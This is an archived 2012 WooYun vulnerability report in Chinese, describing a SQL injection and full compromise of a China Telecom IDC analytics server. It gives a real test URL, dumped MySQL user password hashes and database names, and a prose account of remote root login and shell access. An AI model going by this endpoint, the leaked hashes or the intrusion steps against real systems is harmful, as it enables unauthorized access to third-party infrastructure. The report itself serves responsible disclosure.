当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014845

漏洞标题:中国电信某IDC服务器的奇葩漏洞致服务器沦陷

相关厂商:中国电信

漏洞作者: se55i0n

提交时间:2012-11-16 15:40

修复时间:2012-12-31 15:41

公开时间:2012-12-31 15:41

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-16: 细节已通知厂商并且等待厂商处理中
2012-11-20: 厂商已经确认,细节仅向厂商公开
2012-11-30: 细节向核心白帽子及相关领域专家公开
2012-12-10: 细节向普通白帽子公开
2012-12-20: 细节向实习白帽子公开
2012-12-31: 细节向公众公开

简要描述:

发现的比较的偶然~入侵的比较愕然~

详细说明:

1.偶然间发现的电信的比较奇葩SQL注入漏洞(貌似是为监控客户网站的访问情况),该情况可能在电信IDC具有通用性,测试地址http://118.123.206.9/preuid.php?uid=2610023800

Web Server: 	Apache/2.2.23 (Unix) PHP/5.4.7
Powered-by: 	PHP/5.4.7
DB Server: 	MySQL >=5
Current User: 	root@localhost
Sql Version: 	5.5.28-log
Current DB: 	analytics
System User: 	root@localhost
Host Name: 	localhost.localdomain
Installation dir: /usr
DB User & Pass: root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:localhost
		root::localhost.localdomain
		root::127.0.0.1
		::localhost
		::localhost.localdomain
		remote:*A4B6157319038724E3560894F7F932C8886EBFCF:%
		root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:%
		hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.9
		web:*A4B6157319038724E3560894F7F932C8886EBFCF:%
		hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.7
Data Bases: 	information_schema
		IDC
		analytics
		mysql
		netflow
		performance_schema
		rec_web
		report
		report1
		test
		web
		web_test
		zj


1.jpg


前台没啥看的~

2.jpg


2.数据库权限还是root,好吧看来数据库允许web,remote用户外连,而且都是相同的弱口令,ok~那就来telnet下看是否默认端口吧~~~
bingo~还是root权限~

5.jpg


3.看看有啥好东西没~貌似监控了不少网站~

3.jpg


4.好吧~既然这样了,不拿shell都对不起自己了~(提权已经没啥意义了)

4.jpg


漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-11-20 13:58

厂商回复:

CNVD确认并复现所述情况,已转由CNCERT四川分中心直接联系当地基础电信运营企业处置。
按完全影响机密性,部分影响可用性、完整性进行评分,基本危害评分8.97(高危),发现技术难度系数1.0(数据库可远程是个大弱点),涉及行业或单位影响危害系数1.4(IDC用户较多),综合rank=8.97*1.4=12.558

最新状态:

暂无